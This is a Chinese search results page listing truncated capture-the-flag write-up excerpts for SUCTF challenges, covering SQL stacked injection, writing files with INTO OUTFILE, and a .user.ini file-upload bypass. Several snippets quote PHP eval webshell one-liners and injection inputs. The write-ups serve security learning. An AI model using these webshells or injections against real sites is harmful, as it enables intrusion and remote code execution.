搜索结果
查询Tags标签: SUCTF,共有 16条记录-
BUU [SUCTF]SignIn
无壳直接进入查看main函数v10 = __readfsqword(0x28u);puts("[sign in]");printf("[input your flag]: ");__isoc99_scanf("%99s", v8);sub_96A(v8, v9);__gmpz_init_set_str(v7, "ad939ff59f6e70bcbfad406f2494993757eee98b91bc24418…
2022/4/16 23:17:32 人评论 次浏览 -
[SUCTF 2019]EasySQL 1——堆叠注入+sql_mode
[SUCTF 2019]EasySQL 1——堆叠注入+sql_mode前言个人观点,若有误请指教预备知识当 sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数 当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数 废话不多说…
2021/12/14 19:18:22 人评论 次浏览 -
[SUCTF 2019]EasySQL 1——堆叠注入+sql_mode
[SUCTF 2019]EasySQL 1——堆叠注入+sql_mode前言个人观点,若有误请指教预备知识当 sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数 当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数 废话不多说…
2021/12/14 19:18:22 人评论 次浏览 -
buuctf-[SUCTF 2019]EasySQL 1 堆叠注入
SQL堆叠注入 这个就不再写原理了,之前也遇到很多了,就是一个sql语句";"后面可以继续执行sql查询语句。试一下堆叠注入查询数据库1;show databases;查询表名1;show tables; 按着思路往下走查字段的时候就不行了1;show columns from Flag;山穷水尽,百度wp,发…
2021/11/15 2:14:51 人评论 次浏览 -
buuctf-[SUCTF 2019]EasySQL 1 堆叠注入
SQL堆叠注入 这个就不再写原理了,之前也遇到很多了,就是一个sql语句";"后面可以继续执行sql查询语句。试一下堆叠注入查询数据库1;show databases;查询表名1;show tables; 按着思路往下走查字段的时候就不行了1;show columns from Flag;山穷水尽,百度wp,发…
2021/11/15 2:14:51 人评论 次浏览 -
[SUCTF 2018]MultiSQL
[SUCTF 2018]MultiSQL 0x01前言堆叠注入写shell0x02预编译写shell 需要执行的语句select <?php @eval($_POST[abc]);?> into outfile /var/www/html/favicon/abc.php 为什么选favicon呢?写题目的时候我也不知道,后来上了shell我才知道,其他目录是没有写权限的 …
2021/10/18 2:14:01 人评论 次浏览 -
[SUCTF 2018]MultiSQL
[SUCTF 2018]MultiSQL 0x01前言堆叠注入写shell0x02预编译写shell 需要执行的语句select <?php @eval($_POST[abc]);?> into outfile /var/www/html/favicon/abc.php 为什么选favicon呢?写题目的时候我也不知道,后来上了shell我才知道,其他目录是没有写权限的 …
2021/10/18 2:14:01 人评论 次浏览 -
[SUCTF 2019]EasySQL
好长时间没有写博客了,水一篇文章 拿到题目发现让输入内容,尝试了一下只有三种回显,又发现是sql注入,于是fuzz一下。 第一种:500,显示内容为空,表示字段没有被过滤 第二种:523 表示当前字段都没有被过滤,可以用 第三种:为507,显示内容为nonono,可知已经被过滤掉了…
2021/10/2 19:12:17 人评论 次浏览 -
[SUCTF 2019]EasySQL
好长时间没有写博客了,水一篇文章 拿到题目发现让输入内容,尝试了一下只有三种回显,又发现是sql注入,于是fuzz一下。 第一种:500,显示内容为空,表示字段没有被过滤 第二种:523 表示当前字段都没有被过滤,可以用 第三种:为507,显示内容为nonono,可知已经被过滤掉了…
2021/10/2 19:12:17 人评论 次浏览 -
[SUCTF 2019] EasySQL
打开靶场 输入数字1(经测验发现好像任意数字都会有回显)会有回显,而字符就不会有回显 这里需要注意的一个点就是输入字符后url上不会有回显,说明传参的方式是post而非get,查看源代码后证实了我们的猜测 惯例的使用单引号来检测注入点,发现没有回显,尝试使用堆叠注入…
2021/10/2 2:41:23 人评论 次浏览 -
[SUCTF 2019] EasySQL
打开靶场 输入数字1(经测验发现好像任意数字都会有回显)会有回显,而字符就不会有回显 这里需要注意的一个点就是输入字符后url上不会有回显,说明传参的方式是post而非get,查看源代码后证实了我们的猜测 惯例的使用单引号来检测注入点,发现没有回显,尝试使用堆叠注入…
2021/10/2 2:41:23 人评论 次浏览 -
BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用
文件上传,首先上传一张图片马试试提示<?被过滤,可以用下面代码绕过<script language="php">eval($_POST{attack});</script> 显示上传成功,和已经上传的文件 下面就是想办法上传有效的后门 根据尝试,大部分后缀例如php3,php4,phtml均被过…
2021/8/30 23:09:46 人评论 次浏览 -
BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用
文件上传,首先上传一张图片马试试提示<?被过滤,可以用下面代码绕过<script language="php">eval($_POST{attack});</script> 显示上传成功,和已经上传的文件 下面就是想办法上传有效的后门 根据尝试,大部分后缀例如php3,php4,phtml均被过…
2021/8/30 23:09:46 人评论 次浏览 -
[SUCTF 2019]EasySQL 1
方法一 尝试很多常规的注入方法都不行。 想到使用堆叠注入 查询下数据库 查询数据表 1;show columns from Flag;# 尝试查看flag中数据,失败。 之后看了WP,发现代码中语句是这样的,select $_GET[query] || flag from flag,"||"在mysql中表示或,如果前一个…
2021/8/7 2:07:59 人评论 次浏览 -
[SUCTF 2019]EasySQL 1
方法一 尝试很多常规的注入方法都不行。 想到使用堆叠注入 查询下数据库 查询数据表 1;show columns from Flag;# 尝试查看flag中数据,失败。 之后看了WP,发现代码中语句是这样的,select $_GET[query] || flag from flag,"||"在mysql中表示或,如果前一个…
2021/8/7 2:07:59 人评论 次浏览
